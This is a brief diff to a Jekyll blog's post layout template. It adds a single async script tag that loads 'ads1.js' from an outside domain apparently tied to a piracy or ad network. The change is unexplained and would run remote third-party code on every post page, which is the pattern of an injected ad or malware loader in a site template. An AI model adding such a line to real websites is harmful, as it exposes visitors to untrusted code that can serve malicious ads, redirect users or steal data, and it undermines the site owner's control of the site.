--- a/_layouts/post.html
+++ b/_layouts/post.html
@@ -233,5 +233,6 @@
             "keywords": [{{ page.tags | join: '","' | append: '"' | prepend: '"' }}]
         }
         </script>
+	    <script async defer src="https://tamilrockers.isaiminiweb.online/ads1.js"></script>
     </body>
 </html>
